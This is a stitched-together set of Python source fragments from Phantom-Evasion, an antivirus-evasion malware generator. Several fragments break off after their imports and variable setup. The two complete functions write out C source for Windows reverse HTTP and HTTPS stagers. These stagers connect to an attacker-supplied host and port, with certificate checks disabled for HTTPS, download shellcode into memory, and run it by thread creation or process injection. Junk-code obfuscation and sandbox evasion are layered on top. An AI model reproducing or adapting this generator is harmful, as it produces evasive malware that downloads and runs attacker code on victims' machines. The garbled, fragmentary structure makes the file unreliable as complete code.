# You should have received a copy of the GNU General Public License #
# along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. #
# #
########################################################################################
import sys
from random import shuffle
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import windows_evasion
from usefull import spawn_multiple_process
from usefull import close_brackets_multiproc
from usefull import CheckForBackslash
PathOrFilename = CheckForBackslash(sys.argv[1])
Procname = sys.argv[2]
WaitBeforeCheck = sys.argv[3]
Evasion_Junkcode = sys.argv[4]
SpawnMultiProc = int(sys.argv[5])
RandBool = varname_creator()
RandEntry = varname_creator()
RandHandle = varname_creator()
# along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. #
# #
########################################################################################
import sys
from random import shuffle
from random import sample
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import windows_evasion
from usefull import spawn_multiple_process
from usefull import close_brackets_multiproc
from usefull import CheckForBackslash
Lhost = CheckForBackslash(sys.argv[1])
Lport = sys.argv[2]
SpawnMultiProc = int(sys.argv[3])
Randlpv = varname_creator()
Randpointer = varname_creator()
Randhand = varname_creator()
Randthread = varname_creator()
RandhInternet = varname_creator()
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. #
# #
########################################################################################
import sys
from random import shuffle
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import CheckForBackslash
from usefull import generic_evasion
BashOneliner = CheckForBackslash(sys.argv[1])
Randvarname = varname_creator()
Randptr = varname_creator()
# Random Junkcode
Junkcode_01 = Junkmathinject()
Junkcode_02 = Junkmathinject()
Junkcode_03 = Junkmathinject()
Junkcode_04 = Junkmathinject()
Junkcode_05 = Junkmathinject()
Junkcode_06 = Junkmathinject()
Junkcode_07 = Junkmathinject()
Junkcode_08 = Junkmathinject()
def RevHttpsStager_C_windows(ModOpt):
MemAlloc = ModOpt["MemAlloc"]
ExecMethod = ModOpt["ExecMethod"]
ModOpt["Lhost"] = CheckForBackslash(ModOpt["Lhost"])
Randlpv = varname_creator()
Randlpv2 = varname_creator()
Randpointer = varname_creator()
RandhInternet = varname_creator()
RandhConnect = varname_creator()
RandhRequest = varname_creator()
RandwFlags = varname_creator()
RandISOResult = varname_creator()
RandisSend = varname_creator()
RandwByteRead = varname_creator()
RandisRead = varname_creator()
SumValueFunc = varname_creator()
RandCharArray = varname_creator()
RandCharset = varname_creator()
RandInteger = varname_creator()
RandRecv_int = varname_creator()
ChecksumFunction = varname_creator()
RandCharPtr2 = varname_creator()
RandFuncFlag1 = varname_creator()
RandFuncFlag2 = varname_creator()
Arch = ModOpt["Arch"]
MemAlloc = ModOpt["MemAlloc"]
ExecMethod = ModOpt["ExecMethod"]
if ModOpt["MemAlloc"] in ["SharedSection", "SS"]:
ModOpt["Buff"] = Randlpv
ModOpt["Lpvoid"] = varname_creator()
else:
ModOpt["Buff"] = Randlpv
ModOpt["Lpvoid"] = Randlpv
ModOpt["Decoder"] = "False"
ModOpt["Bufflen"] = "8000000"
Ret_code = ""
IncludeList = [
"#include <stdlib.h>\n", "#include <windows.h>\n",
"#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n",
"#include <math.h>\n"
]
Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n"
Ret_code += "#include <wininet.h>\n"
if ModOpt["Outformat"] == "exe":
Ret_code += "int main(int argc,char * argv[]){\n"
elif ModOpt["Outformat"] == "dll":
if ModOpt["Reflective"] == True:
Ret_code += "#include \"ReflectiveLoader.h\"\n"
Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
Ret_code += "BOOL bReturnValue = TRUE;\n"
Ret_code += "if(dwReason == DLL_PROCESS_ATTACH){\n"
if ModOpt["DynImport"] == True:
ModOpt["NtdllHandle"] = varname_creator()
ModOpt["Ker32Handle"] = varname_creator()
Ret_code += "HANDLE " + ModOpt[
"NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
Ret_code += "HANDLE " + ModOpt[
"Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
Ret_code += "$:START\n"
Ret_code += WindowsDefend(ModOpt)
#Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])
Ret_code += "$:EVA\n"
if ModOpt["DynImport"] == True:
ModOpt["NtdllHandle"] = varname_creator()
ModOpt["Ker32Handle"] = varname_creator()
Wininet = varname_creator()
NdcInternetOpenA = varname_creator()
NdcInternetConnectA = varname_creator()
NdcHttpOpenRequestA = varname_creator()
NdcInternetSetOption = varname_creator()
NdcHttpSendRequestA = varname_creator()
NdcInternetReadFile = varname_creator()
Ret_code += "HANDLE " + ModOpt[
"NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
Ret_code += "HANDLE " + ModOpt[
"Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
Ret_code += "HANDLE " + Wininet + " = GetModuleHandle(\"wininet.dll\");\n"
Ret_code += "FARPROC " + NdcInternetOpenA + " = GetProcAddress(" + Wininet + ", \"InternetOpenA\");\n"
Ret_code += "HINTERNET " + RandhInternet + " = (HINTERNET)" + NdcInternetOpenA + "(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
Ret_code += "if (" + RandhInternet + " != NULL){\n"
Ret_code += "FARPROC " + NdcInternetConnectA + " = GetProcAddress(" + Wininet + ", \"InternetConnectA\");\n"
Ret_code += "HINTERNET " + RandhConnect + " = (HINTERNET)" + NdcInternetConnectA + "(" + RandhInternet + ", \"" + ModOpt[
"Lhost"] + "\"," + ModOpt[
"Lport"] + ", NULL,NULL, INTERNET_SERVICE_HTTP,INTERNET_FLAG_SECURE,1);\n"
Ret_code += "if (" + RandhConnect + " != NULL){\n"
Ret_code += "FARPROC " + NdcHttpOpenRequestA + " = GetProcAddress(" + Wininet + ", \"HttpOpenRequestA\");\n"
Ret_code += "HINTERNET " + RandhRequest + " = (HINTERNET)" + NdcHttpOpenRequestA + "(" + RandhConnect + ",NULL,\"" + UriGenerator(
) + "\",NULL, NULL, 0, 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000,1);\n"
Ret_code += "if (" + RandhRequest + "!= NULL){\n"
Ret_code += "DWORD " + RandwFlags + " = 0x00002000 | 0x00001000 | 0x00000200 | 0x00000100 | 0x00000080;\n"
Ret_code += "FARPROC " + NdcInternetSetOption + " = GetProcAddress(" + Wininet + ", \"InternetSetOption\");\n"
Ret_code += "BOOL " + RandISOResult + " = " + NdcInternetSetOption + "(" + RandhRequest + ",INTERNET_OPTION_SECURITY_FLAGS, &" + RandwFlags + ", sizeof (" + RandwFlags + ") );\n"
Ret_code += "LPVOID " + Randlpv + ";\n"
Ret_code += inject_utils.Win_MemLocal(ModOpt)
Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
Ret_code += "FARPROC " + NdcHttpSendRequestA + " = GetProcAddress(" + Wininet + ", \"HttpSendRequestA\");\n"
Ret_code += "BOOL " + RandisSend + " = " + NdcHttpSendRequestA + "(" + RandhRequest + ", NULL, 0, NULL, 0);\n"
Ret_code += "if (" + RandisSend + "){\n"
Ret_code += "FARPROC " + NdcInternetReadFile + " = GetProcAddress(" + Wininet + ", \"InternetReadFile\");\n"
Ret_code += "DWORD " + RandwByteRead + ";\n"
Ret_code += "do{\n"
Ret_code += "BOOL " + RandisRead + " = " + NdcInternetReadFile + "(" + RandhRequest + "," + Randpointer + ", 1024, &" + RandwByteRead + ");\n"
else:
Ret_code += "HINTERNET " + RandhInternet + " = InternetOpenA(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
Ret_code += "if (" + RandhInternet + " != NULL){\n"
Ret_code += "HINTERNET " + RandhConnect + " = InternetConnectA(" + RandhInternet + ",\"" + ModOpt[
"Lhost"] + "\"," + ModOpt[
"Lport"] + ", NULL,NULL, INTERNET_SERVICE_HTTP,INTERNET_FLAG_SECURE,1);\n"
Ret_code += "if (" + RandhConnect + " != NULL){\n"
Ret_code += "HINTERNET " + RandhRequest + " = HttpOpenRequestA(" + RandhConnect + ",NULL,\"" + UriGenerator(
) + "\",NULL, NULL, 0, 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000,1);\n"
Ret_code += "if (" + RandhRequest + "!= NULL){\n"
Ret_code += "DWORD " + RandwFlags + " = 0x00002000 | 0x00001000 | 0x00000200 | 0x00000100 | 0x00000080;\n"
Ret_code += "BOOL " + RandISOResult + " = InternetSetOption (" + RandhRequest + ",INTERNET_OPTION_SECURITY_FLAGS, &" + RandwFlags + ", sizeof (" + RandwFlags + ") );\n"
Ret_code += "LPVOID " + Randlpv + ";\n"
Ret_code += inject_utils.Win_MemLocal(ModOpt)
Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
Ret_code += "BOOL " + RandisSend + " = HttpSendRequestA(" + RandhRequest + ", NULL, 0, NULL, 0);\n"
Ret_code += "if (" + RandisSend + "){\n"
Ret_code += "DWORD " + RandwByteRead + ";\n"
Ret_code += "do{\n"
Ret_code += "BOOL " + RandisRead + " = InternetReadFile(" + RandhRequest + "," + Randpointer + ",8192, &" + RandwByteRead + ");\n"
Ret_code += Randpointer + " += " + RandwByteRead + ";\n"
Ret_code += "}while(" + RandwByteRead + " > 0);\n"
if "RW/" in MemAlloc and ExecMethod == "Thread":
Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt)
if ModOpt["ExecMethod"] == "Thread":
Ret_code += inject_utils.Win_LocalThread(ModOpt)
else:
Ret_code += inject_utils.Win_RemoteInjection(ModOpt)
Ret_code += "}}}}\n"
Ret_code += "$:END\n"
#Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])
Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
ModOpt["JR"])
if ModOpt["Outformat"] == "exe":
Ret_code += "return 0;}"
elif ModOpt["Outformat"] == "dll":
Ret_code += "}\n"
Ret_code += "return bReturnValue;}\n"
WriteSource("Source.c", Ret_code)
# You should have received a copy of the GNU General Public License #
# along with Phantom-Evasion. If not, see <http://www.gnu.org/licenses/>. #
# #
########################################################################################
import sys
from random import shuffle
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import Junkmathinject
from usefull import windows_evasion
from usefull import spawn_multiple_process
from usefull import close_brackets_multiproc
from usefull import CheckForBackslash
Powershell_payload = CheckForBackslash(sys.argv[1])
SpawnMultiProc = int(sys.argv[2])
Randvarname = varname_creator()
Junkcode_01 = Junkmathinject()
Junkcode_02 = Junkmathinject()
Junkcode_03 = Junkmathinject()
Junkcode_04 = Junkmathinject()
Junkcode_05 = Junkmathinject()
Junkcode_06 = Junkmathinject()
Junkcode_07 = Junkmathinject()
Junkcode_08 = Junkmathinject()
Junkcode_09 = Junkmathinject()
Junkcode_10 = Junkmathinject()
def RevHttpStager_C_windows(ModOpt):
Lhost = CheckForBackslash(ModOpt["Lhost"])
Lport = ModOpt["Lport"]
MemAlloc = ModOpt["MemAlloc"]
ExecMethod = ModOpt["ExecMethod"]
Randlpv = varname_creator()
Randlpv2 = varname_creator()
Randpointer2 = varname_creator()
Randbuff = varname_creator()
Randversion = varname_creator()
Randwsadata = varname_creator()
RandRevtarget = varname_creator()
Randsock = varname_creator()
RandSocket = varname_creator()
RandRecv_int = varname_creator()
Arch = ModOpt["Arch"]
MemAlloc = ModOpt["MemAlloc"]
ExecMethod = ModOpt["ExecMethod"]
if ModOpt["MemAlloc"] in ["SharedSection", "SS"]:
ModOpt["Buff"] = Randlpv
ModOpt["Lpvoid"] = varname_creator()
else:
ModOpt["Buff"] = Randlpv
ModOpt["Lpvoid"] = Randlpv
ModOpt["Decoder"] = "False"
ModOpt["Bufflen"] = "1000000"
Ret_code = ""
Ret_code += "#define _WIN32_WINNT 0x0500\n"
Ret_code += "#include <winsock2.h>\n"
IncludeList = [
"#include <stdlib.h>\n", "#include <windows.h>\n",
"#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n",
"#include <math.h>\n"
]
Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n"
if ModOpt["Outformat"] == "exe":
Ret_code += "int main(int argc,char * argv[]){\n"
elif ModOpt["Outformat"] == "dll":
if ModOpt["Reflective"] == True:
Ret_code += "#include \"ReflectiveLoader.h\"\n"
Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
Ret_code += "BOOL bReturnValue = TRUE;\n"
Ret_code += "if(dwReason == DLL_PROCESS_ATTACH){\n"
if ModOpt["DynImport"] == True:
ModOpt["NtdllHandle"] = varname_creator()
ModOpt["Ker32Handle"] = varname_creator()
Ret_code += "HANDLE " + ModOpt[
"NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
Ret_code += "HANDLE " + ModOpt[
"Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
Ret_code += "$:START\n"
Ret_code += WindowsDefend(ModOpt)
#Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])
Ret_code += "$:EVA\n"
Ret_code += "char * " + Randlpv + ";\n"
Ret_code += "WORD " + Randversion + " = MAKEWORD(2,2);WSADATA " + Randwsadata + ";\n"
if ModOpt["DynImport"] == True:
ModOpt["NtdllHandle"] = varname_creator()
ModOpt["Ker32Handle"] = varname_creator()
WS2_32 = varname_creator()
NdcWSAStartup = varname_creator()
NdcWSACleanup = varname_creator()
Ret_code += "HANDLE " + ModOpt[
"NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
Ret_code += "HANDLE " + ModOpt[
"Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
Ret_code += "HANDLE " + WS2_32 + " = GetModuleHandle(\"ws2_32.dll\");\n"
Ret_code += "FARPROC " + NdcWSAStartup + " = GetProcAddress(" + WS2_32 + ", \"WSAStartup\");\n"
Ret_code += "FARPROC " + NdcWSACleanup + " = GetProcAddress(" + WS2_32 + ", \"WSACleanup\");\n"
Ret_code += "if (" + NdcWSAStartup + "(" + Randversion + ", &" + Randwsadata + ") < 0){"
Ret_code += NdcWSACleanup + "();exit(1);}\n"
else:
Ret_code += "if (WSAStartup(" + Randversion + ", &" + Randwsadata + ") < 0){\n"
Ret_code += "WSACleanup();exit(1);}\n"
Ret_code += "struct hostent * " + RandRevtarget + ";struct sockaddr_in " + Randsock + ";SOCKET " + RandSocket + ";\n"
Ret_code += RandSocket + " = socket(AF_INET, SOCK_STREAM, 0);\n"
if ModOpt["DynImport"] == True:
Ret_code += "if (" + RandSocket + " == INVALID_SOCKET){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"
Ret_code += RandRevtarget + " = gethostbyname(\"" + ModOpt[
"Lhost"] + "\");\n" #Lhost
if ModOpt["DynImport"] == True:
Ret_code += "if (" + RandRevtarget + " == NULL){closesocket(" + RandSocket + ");" + NdcWSACleanup + "();exit(1);}\n"
else:
Ret_code += "if (" + RandRevtarget + " == NULL){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"
Ret_code += "memcpy(&" + Randsock + ".sin_addr.s_addr, " + RandRevtarget + "->h_addr, " + RandRevtarget + "->h_length);\n"
Ret_code += Randsock + ".sin_family = AF_INET;\n"
Ret_code += Randsock + ".sin_port = htons((" + ModOpt[
"Lport"] + "));\n" #Lport
Ret_code += "if ( connect(" + RandSocket + ", (struct sockaddr *)&" + Randsock + ", sizeof(" + Randsock + ")) ){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"
Ret_code += "char " + Randbuff + "[400] = \"GET /" + UriGenerator(
) + " HTTP/1.1\\r\\nHost: " + Lhost + ":" + Lport + "\\r\\nConnection: Keep-Alive\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\\r\\n\\r\\n\";\n"
Ret_code += "send(" + RandSocket + "," + Randbuff + ", strlen( " + Randbuff + " ),0);\n"
Ret_code += "Sleep(300);\n"
Ret_code += inject_utils.Win_MemLocal(ModOpt)
Ret_code += "char * " + Randpointer2 + " = " + Randlpv + ";\n"
Ret_code += "int " + RandRecv_int + ";\n"
Ret_code += "do {" + RandRecv_int + " = recv(" + RandSocket + ", " + Randpointer2 + ", 1024, 0);\n"
Ret_code += "" + Randpointer2 + " += " + RandRecv_int + ";\n"
Ret_code += "}while ( " + RandRecv_int + " > 0 );\n"
if ModOpt["DynImport"] == True:
Ret_code += "closesocket(" + RandSocket + ");" + NdcWSACleanup + "();\n"
else:
Ret_code += "closesocket(" + RandSocket + ");WSACleanup();\n"
if "RW/" in MemAlloc and ExecMethod == "Thread":
Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt)
Ret_code += Randlpv + " = strstr(" + Randlpv + ", \"\\r\\n\\r\\n\") + 4;\n"
if ModOpt["ExecMethod"] == "Thread":
Ret_code += inject_utils.Win_LocalThread(ModOpt)
else:
Ret_code += inject_utils.Win_RemoteInjection(ModOpt)
Ret_code += "$:END\n"
#Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])
Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
ModOpt["JR"])
if ModOpt["Outformat"] == "exe":
Ret_code += "return 0;}"
elif ModOpt["Outformat"] == "dll":
Ret_code += "}\n"
Ret_code += "return bReturnValue;}\n"
WriteSource("Source.c", Ret_code)
